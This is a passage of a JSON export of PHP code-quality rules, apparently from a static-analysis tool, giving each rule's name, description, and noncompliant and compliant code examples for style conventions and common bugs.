pressJuice($apply, $orange);   \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n    do_something();       \/\/ Compliant; there is no space after the method name\n\n    foreach ($fruits as $fruit_key =&gt; $fruit) {  \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n  ...\n}\n\nclass ClassB2 extends             \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n  ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n    \\ArrayAccess,         \/\/ Compliant; the list of implemented interfaces is correctly indented\n    \\Countable,\n    \\Serializable\n{\n  \/* Argument lists may be split across multiple lines, where each subsequent line\n   * is indented once. When doing so, the first item in the list should be on the next line,\n   * and there should be only one argument per line. 
Also, when the argument list is\n   * split across multiple lines, the closing parenthesis and opening brace should be\n   * placed together on their own line with one space between them.\n   *\/\n  public function aVeryLongMethodName(\n    ClassTypeHint $arg1,  \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n      &amp;$arg2,\n      array $arg3 = []\n    ) {\n      $noArgs_longVars = function () use (\n        $longVar1,        \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n        $longerVar2,\n        $muchLongerVar3\n      ) {\n        ...\n      };\n\n\n    \/* Argument lists may be split across multiple lines, where each subsequent line is\n     * indented once. When doing so, the first item in the list should be on the next line,\n     * and there should be only one argument per line.\n     *\/\n    $foo-&gt;bar(\n      $longArgument,       \/\/ Compliant; the arguments in the method call are be correctly indented\n      $longerArgument,\n      $muchLongerArgument\n    );                     \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n    \/* Closures should be declared with a space after the \"function\" keyword,\n     * and a space before and after the \"use\" keyword.\n     *\/\n    $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n      ...\n    };\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, &quot;extends&quot; and &quot;implements&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly 
spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":"&quot;namespace&quot; declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after &quot;as&quot; keyword and &quot;=&gt;&quot; operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next &quot;else&quot;, &quot;catch&quot; and &quot;finally&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":"&quot;use&quot; declarations should be followed 
by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each &quot;;&quot; in &quot;for&quot; statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":"&quot;use&quot; declarations should be placed after &quot;namespace&quot; declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x &lt; 0) {\n  new foo;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x &lt; 0) {\n  $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. 
At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 1)  \/\/ Noncompliant\n  moveWindowToTheBackground();\n\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  case 1:  \/\/ Noncompliant\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 3)\n  moveWindowToTheBackground();\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches 
in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 
12 &gt; 4 : 4;  \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n  case 3:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif (($a &gt;= 0 &amp;&amp; $a &lt; 10) || ($a &gt;= 20 &amp;&amp; $a &lt; 50)) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doTheRest();\n}\n\nint b = a ? 12 &gt; 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n$name = \"George\";\n?&gt;\n&lt;p&gt; Hello &lt;?php echo $name ?&gt;!&lt;\/p&gt;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n  As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... 
And as of PHP 5.4.0, call-time pass-by-reference\n  was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&amp;$name);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code>&lt;?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest&lt;?php  \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n&lt;?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. 
In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Deprecated<\/th>\n      <th>Use Instead<\/th>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method()<\/code><\/td>\n      <td><code>call_user_func()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method_array()<\/code><\/td>\n      <td><code>call_user_func_array()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>define_syslog_variables()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>dl()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg()<\/code><\/td>\n      <td><code>preg_match()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi()<\/code><\/td>\n      <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_register()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_unregister()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_is_registered()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_socket_blocking()<\/code><\/td>\n      <td><code>stream_set_blocking()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>split()<\/code><\/td>\n      <td><code>preg_split()<\/code><\/td>\n    
<\/tr>\n    <tr>\n      <td><code>spliti()<\/code><\/td>\n      <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>sql_regcase()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_db_query()<\/code><\/td>\n      <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_escape_string()<\/code><\/td>\n      <td><code>mysql_real_escape_string()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td>Passing locale category names as strings<\/td>\n      <td>Use the LC_* family of constants<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain, nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password);  \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. 
However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php';  \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php';  \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n  include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". 
Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n  function f_inner () {\n    function f_inner_inner() {\n      function f_inner_inner_inner() { \/\/ Noncompliant\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\";  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass MyClass {\n\n  public static $name = \"Bob\"; \/\/ Compliant\n\n  public static function doSomething($arg) {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&amp;&amp;<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&amp;&amp;<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money;  \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time &amp;&amp; $have_money;  \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. 
Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n  global $myGlobalVariable; \/\/ Noncompliant\n  $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo(){\n    if ($this-&gt;name != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo($nameParam){\n    if ($nameParam != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. 
The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n  <li> generating output <\/li>\n  <li> modifying <code>ini<\/code> settings <\/li>\n  <li> emitting errors or exceptions <\/li>\n  <li> modifying global or static variables <\/li>\n  <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nprint \"Include worked!\";\n\nclass foo {\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass foo {\n\n  public function log() {\n    print \"Include worked!\";\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. 
<code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        self::getStatus();  \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {  \/\/ Doesn't actually get called\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        static::getStatus();  \/\/ Compliant\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n    private static $somevar = \"hello\";\n    const CONSTANT = 42;\n\n    private static function foo()\n    {\n        $var = self::$somevar . self::CONSTANT;  \/\/ Should be OK\n        self::foo();                               \/\/ Should be OK\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. 
Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff';  \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff';  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF';  \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF';  \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\");  \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. 
Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this-&gt;params()-&gt;fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. 
